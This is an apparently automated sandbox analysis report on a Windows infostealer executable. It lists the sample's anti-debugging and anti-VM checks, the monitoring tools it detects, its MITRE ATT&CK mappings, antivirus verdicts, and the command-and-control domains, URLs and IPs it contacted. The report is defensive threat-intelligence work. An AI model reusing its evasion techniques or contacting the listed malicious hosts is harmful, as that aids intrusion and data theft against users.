Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170C60 second address: 7170CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC1h 0x00000009 adc esi, 3E84CC06h 0x0000000f jmp 00007F6F951A9EC1h 0x00000014 popfd 0x00000015 mov ah, 0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F6F951A9EC3h 0x00000020 mov ebp, esp 0x00000022 jmp 00007F6F951A9EC6h 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170CC5 second address: 7170CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170CC9 second address: 7170CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170CCD second address: 7170CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170CD3 second address: 7170CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71100F1 second address: 711013D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6F946E7E3Eh 0x0000000f push eax 0x00000010 jmp 00007F6F946E7E3Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6F946E7E45h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 711013D second address: 7110143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7110143 second address: 7110147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 70B0016 second address: 70B0028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70B0028 second address: 70B002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70B0A21 second address: 70B0A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71008A6 second address: 71008F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F946E7E47h 0x00000009 xor cx, 3E3Eh 0x0000000e jmp 00007F6F946E7E49h 0x00000013 popfd 0x00000014 mov esi, 458CB587h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 mov esi, 5C280E77h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71008F6 second address: 71008FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E001F second address: 70E0023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0023 second address: 70E0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0029 second address: 70E0053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F946E7E47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E0053 second address: 70E006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E006B second address: 70E009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6F946E7E49h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E009D second address: 70E00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E00A1 second address: 70E00A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E00A5 second address: 70E00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E01CC second address: 70E01D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 70E01D1 second address: 70E0231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F6F951A9EC6h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F6F951A9EC0h 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6F951A9EC7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Special instruction interceptor: First address: A8DBAA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Special instruction interceptor: First address: C378D4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Special instruction interceptor: First address: C61866 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Special instruction interceptor: First address: A8DAC5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Special instruction interceptor: First address: C3FB38 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Code function: 0_2_00659980 rdtsc 0_2_00659980
Source: C:\Users\user\Desktop\wlEp68Few5.exe TID: 3440 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\wlEp68Few5.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Code function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0047255D
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Code function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004729FF
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: wlEp68Few5.exe, 00000000.00000003.1410063704.0000000006981000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#a
Source: wlEp68Few5.exe | Binary or memory string: Hyper-V RAW
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\wlEp68Few5.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Code function: 0_2_070F06CC Start: 070F08CB End: 070F06DB 0_2_070F06CC
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\wlEp68Few5.exe | File opened: NTICE
Source: C:\Users\user\Desktop\wlEp68Few5.exe | File opened: SICE
Source: C:\Users\user\Desktop\wlEp68Few5.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Code function: 0_2_00659980 rdtsc 0_2_00659980
Source: wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oRD%$Program Manager
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: RD%$Program Manager
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\wlEp68Few5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49732 -> 194.87.47.113:80
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the counts shown in the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus scan results (source | detection | scanner | label):
wlEp68Few5.exe | 47% | Virustotal
wlEp68Few5.exe | 45% | ReversingLabs | Win32.Infostealer.Tinba
wlEp68Few5.exe | 100% | Avira | TR/Crypt.TPM.Gen
wlEp68Few5.exe | 100% | Joe Sandbox ML
No Antivirus matches

URL scan results (source | detection | scanner | label):
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument= | 100% | Avira URL Cloud | malware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963 | 100% | Avira URL Cloud | malware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1 | 100% | Avira URL Cloud | malware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | 100% | Avira URL Cloud | malware
Contacted domains (name | IP | active | malicious | reputation):
home.twentytk20pn.top | 194.87.47.113 | active: true | malicious: false | reputation: high
httpbin.org | 98.85.100.80 | active: true | malicious: false | reputation: high

Contacted URLs (name | malicious | reputation):
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | malicious: false | reputation: high
https://httpbin.org/ip | malicious: false | reputation: high

URLs found in memory or binary data (name | source | malicious | antivirus detection | reputation):
https://curl.se/docs/hsts.html | wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://html4/loose.dtd | wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
https://curl.se/docs/alt-svc.html# | wlEp68Few5.exe | malicious: false | reputation: high
https://httpbin.org/ipbefore | wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1 | wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: malware | reputation: unknown
https://curl.se/docs/http-cookies.html | wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument= | wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: malware | reputation: unknown
https://curl.se/docs/hsts.html# | wlEp68Few5.exe | malicious: false | reputation: high
https://curl.se/docs/http-cookies.html# | wlEp68Few5.exe | malicious: false | reputation: high
https://curl.se/docs/alt-svc.html | wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963 | wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: malware | reputation: unknown
http://.css | wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://.jpg | wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | reputation: high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | malicious: false | Avira URL Cloud: malware | reputation: unknown
Contacted IPs (IP | domain | country | ASN | ASN name | malicious):
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | malicious: false
194.87.47.113 | home.twentytk20pn.top | Russian Federation | 49392 | ASBAXETNRU | malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578070
Start date and time: 2024-12-19 08:32:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wlEp68Few5.exe (renamed because the original name is a hash value)
Original Sample Name: 8cd346fc831e7d59ebab0de045018b84.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 92
• Number of non-executed functions: 50
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:33:32 | API Interceptor | 3x Sleep call for process: wlEp68Few5.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                98.85.100.80Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                  rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    194.87.47.113rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                    • 98.85.100.80
                                                    home.twentytk20pn.toprJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 194.87.47.113
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 185.185.71.170
                                                    aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.185.71.170
                                                    vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                    • 185.185.71.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-11351-NORTHEASTUS | Sh2uIqqKqc.exe | malicious | Cryptbot | 98.85.100.80
 | rJvOqHxkuI.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 98.85.100.80
 | NVkyG9HAeY.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | W6seF0MjGW.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | f1842FwKth.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | aweqG2ssAY.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | vH7JfdNi3c.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | U6mwWZlkzH.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | KzLv0EXDs1.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
ASBAXETNRU | rJvOqHxkuI.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 194.87.47.113
 | NWKk493xTy.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
 | 88S3zQTYpl.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
 | NVkyG9HAeY.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
 | 17345062850621022e2a034193497843f70f72ad0e2a6d5b0e23bb6cd0de4c41fac1759029833.dat-decoded.exe | malicious | AsyncRAT, DcRat | 45.135.232.38
 | H6Lzd3cP3H.exe | malicious | Unknown | 194.87.47.99
 | k4c3YnjoBr.exe | malicious | Cryptbot | 194.87.47.99
 | 1SzdrH2oTL.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.99
 | b3astmode.arm5.elf | malicious | Mirai | 91.193.216.252
                                                    No context
